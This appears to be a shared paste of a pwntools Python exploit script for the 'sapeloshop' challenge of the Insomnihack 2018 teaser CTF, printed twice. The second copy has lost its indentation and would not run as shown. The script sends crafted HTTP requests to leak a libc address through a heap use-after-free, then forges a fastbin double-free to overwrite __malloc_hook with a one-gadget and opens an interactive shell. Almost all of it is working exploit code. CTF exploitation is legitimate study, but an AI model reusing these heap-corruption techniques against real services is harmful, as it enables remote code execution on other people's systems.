romanking98 · January 22, 2018 13:37
diff --git a/exploit_sapeloshop.py b/exploit_sapeloshop.py
 #!/usr/bin/python
 from pwn import *

 elf = ELF("./libc-2.23.so")
 #r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
 r = remote('sapeloshop.teaser.insomnihack.ch', 80)
 #r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
 raw_input()

 i = int("3d714", 16)
 def get(where):
    global r
    d = "GET %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nConnection: keep-alive\r\n\r\n" % where

    r.write(d)
    o = r.readuntil('Content-Length: ')
    t = r.readline()
    o += t
    sz = int(t.strip())+1
    o += r.recvn(sz)
    print "========== GET", where
    print o
    print "-"*100

    return o

 def post(where, what):
    global r
    d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)

    r.write(d)
    o = r.readuntil('Content-Length: ')
    t = r.readline()
    o += t
    sz = int(t.strip())+1
    o += r.recvn(sz)
    print "========== POST %s: %s" % (where, what)
    print o
    print "-"*100

    return o

 def post2(where, what):
    global r
    d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)

    r.write(d)

 get("/")
 desc1 = "desc="
 desc1 += "A"*90
 desc2 = "desc="
 desc2 += "B"*90
 desc3 = "desc="
 desc3 += "C"*90


 buf1 = "desc="
 buf1 += "X"*200

 post("/add",buf1)
 buf2 = "desc="
 buf2 += "Y"*200

 post("/add",buf2)

 post("/inc","item=0")
 post("/sub", "item=0")
 post("/sub", "item=0")
 post("/inc","item=0")

 # Cleanup heap.

 leak = post("/del","item=1")

 leak = leak.split("><img src=")

 for i in range(len(leak)):
 	if "col-md-8" in leak[i]:
 		leak = leak[i+1]

 leak = leak[5:11] + "\x00"*2
 leak = u64(leak) - 0x3c4b78

 sol = "desc="
 sol += "B"*(0x1b0-5)

 post("/add",sol)
 post("/add","desc=A")

 # Start attack.

 post("/add", desc1)
 post("/add", desc2)
 post("/add", desc3)
 post("/inc", "item=2")
 post("/sub", "item=2")
 post("/sub", "item=2")
 post("/inc", "item=2")
 post("/del", "item=3")
 post("/sub", "item=2")

 # Fastbin freelist : A -> B -> A
 # Control FD of A in first allocation.

 # first allocation -- set FD to __malloc_hook.
 # 4th allocation will be near __malloc_hook.
 fin1 = "desc="
 fin1 += "D"*90
 malloc_hook = p64(leak + 0x3c4aed)

 print hex(leak)
 raw_input()

 fin2 = "desc="
 fin2 += malloc_hook[0:6]
 fin2 += "%00%00"  # URL encoding of NULL bytes.
 fin2 += "E"*78

 fin3 = "desc="
 fin3 += "F"*90

 fin4 = "desc="
 fin4 += "G"*90

 fin5 = "desc="
 fin5 += "H"*19
 system = leak + 0x45216
 system = leak + 0xf1147
 system = leak + 0xf02a4
 fin5 += p64(system)[0:6]
 fin5 += "%00%00"
 fin5 += "H"*(90-27)

 post("/add", fin2)
 post("/add", fin3)

 post("/add", fin4)
 post("/add", fin5)

 post2("/add","desc=DASJKDAS")
 #post("/sub", "item=0")
 #post("/del", "item=1")
 #post

 r.interactive()
	#!/usr/bin/python
	from pwn import *

	elf = ELF("./libc-2.23.so")
	#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
	r = remote('sapeloshop.teaser.insomnihack.ch', 80)
	#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
	raw_input()

	i = int("3d714", 16)
	def get(where):
	global r
	d = "GET %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nConnection: keep-alive\r\n\r\n" % where

	r.write(d)
	o = r.readuntil('Content-Length: ')
	t = r.readline()
	o += t
	sz = int(t.strip())+1
	o += r.recvn(sz)
	print "========== GET", where
	print o
	print "-"*100

	return o

	def post(where, what):
	global r
	d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)

	r.write(d)
	o = r.readuntil('Content-Length: ')
	t = r.readline()
	o += t
	sz = int(t.strip())+1
	o += r.recvn(sz)
	print "========== POST %s: %s" % (where, what)
	print o
	print "-"*100

	return o

	def post2(where, what):
	global r
	d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)

	r.write(d)

	get("/")
	desc1 = "desc="
	desc1 += "A"*90
	desc2 = "desc="
	desc2 += "B"*90
	desc3 = "desc="
	desc3 += "C"*90


	buf1 = "desc="
	buf1 += "X"*200

	post("/add",buf1)
	buf2 = "desc="
	buf2 += "Y"*200

	post("/add",buf2)

	post("/inc","item=0")
	post("/sub", "item=0")
	post("/sub", "item=0")
	post("/inc","item=0")

	# Cleanup heap.

	leak = post("/del","item=1")

	leak = leak.split("><img src=")

	for i in range(len(leak)):
	if "col-md-8" in leak[i]:
	leak = leak[i+1]

	leak = leak[5:11] + "\x00"*2
	leak = u64(leak) - 0x3c4b78

	sol = "desc="
	sol += "B"*(0x1b0-5)

	post("/add",sol)
	post("/add","desc=A")

	# Start attack.

	post("/add", desc1)
	post("/add", desc2)
	post("/add", desc3)
	post("/inc", "item=2")
	post("/sub", "item=2")
	post("/sub", "item=2")
	post("/inc", "item=2")
	post("/del", "item=3")
	post("/sub", "item=2")

	# Fastbin freelist : A -> B -> A
	# Control FD of A in first allocation.

	# first allocation -- set FD to __malloc_hook.
	# 4th allocation will be near __malloc_hook.
	fin1 = "desc="
	fin1 += "D"*90
	malloc_hook = p64(leak + 0x3c4aed)

	print hex(leak)
	raw_input()

	fin2 = "desc="
	fin2 += malloc_hook[0:6]
	fin2 += "%00%00" # URL encoding of NULL bytes.
	fin2 += "E"*78

	fin3 = "desc="
	fin3 += "F"*90

	fin4 = "desc="
	fin4 += "G"*90

	fin5 = "desc="
	fin5 += "H"*19
	system = leak + 0x45216
	system = leak + 0xf1147
	system = leak + 0xf02a4
	fin5 += p64(system)[0:6]
	fin5 += "%00%00"
	fin5 += "H"*(90-27)

	post("/add", fin2)
	post("/add", fin3)

	post("/add", fin4)
	post("/add", fin5)

	post2("/add","desc=DASJKDAS")
	#post("/sub", "item=0")
	#post("/del", "item=1")
	#post

	r.interactive()